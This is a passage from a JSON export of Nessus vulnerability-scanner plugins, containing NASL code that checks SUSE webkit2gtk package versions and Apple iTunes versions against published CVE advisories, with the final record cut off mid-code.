audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLED_SAP15|SLES15|SLES_SAP15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLED_SAP15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED_SAP15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP15\" && (! preg(pattern:\"^(2|3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP15 SP2/3\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-2', 'sles-release-15.2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2', 'sles-ltss-release-15.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'2', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'sle-module-desktop-applications-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.2']},\n {'reference':'webkit2gtk3-devel-2.36.4-150200.38.2', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.2']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n if ('ltss' >< tolower(check)) ltss_caveat_required = TRUE;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libjavascriptcoregtk-4_0-18 / libwebkit2gtk-4_0-37 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:42:27", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.12.3. It is, therefore, affected by multiple vulnerabilities as referenced in the HT213188 advisory.\n\n - Processing a maliciously crafted image may lead to arbitrary code execution (CVE-2022-22611)\n\n - Processing a maliciously crafted image may lead to heap corruption (CVE-2022-22612)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2022-22629)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-15T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.12.3 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22629", "CVE-2022-22662"], "modified": "2023-03-23T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_12_3.NASL", "href": "https://www.tenable.com/plugins/nessus/158930", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158930);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\n \"CVE-2022-22611\",\n \"CVE-2022-22612\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213188\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14\");\n\n script_name(english:\"Apple iTunes < 12.12.3 Multiple Vulnerabilities (credentialed check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is prior to 12.12.3. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the HT213188 advisory.\n\n - Processing a maliciously crafted image may lead to arbitrary code execution (CVE-2022-22611)\n\n - Processing a maliciously crafted image may lead to heap corruption (CVE-2022-22612)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2022-22629)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213188\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.12.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22612\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22629\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar app_info = vcf::get_app_info(app:'iTunes Version', win_local:TRUE);\nvar constraints = [{'fixed_version':'12.12.3'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:08", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.12.3. It is, therefore, affected by multiple vulnerabilities as referenced in the HT213188 advisory.\n\n - Processing a maliciously crafted image may lead to arbitrary code execution (CVE-2022-22611)\n\n - Processing a maliciously crafted image may lead to heap corruption (CVE-2022-22612)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2022-22629)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-15T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.12.3 Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22629", "CVE-2022-22662"], "modified": "2023-03-23T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_12_3_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/158931", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158931);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\n \"CVE-2022-22611\",\n \"CVE-2022-22612\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213188\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14\");\n\n script_name(english:\"Apple iTunes < 12.12.3 Multiple Vulnerabilities (uncredentialed check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is prior to 12.12.3. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the HT213188 advisory.\n\n - Processing a maliciously crafted image may lead to arbitrary code execution (CVE-2022-22611)\n\n - Processing a maliciously crafted image may lead to heap corruption (CVE-2022-22612)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2022-22629)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213188\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.12.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22612\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22629\");\n\n 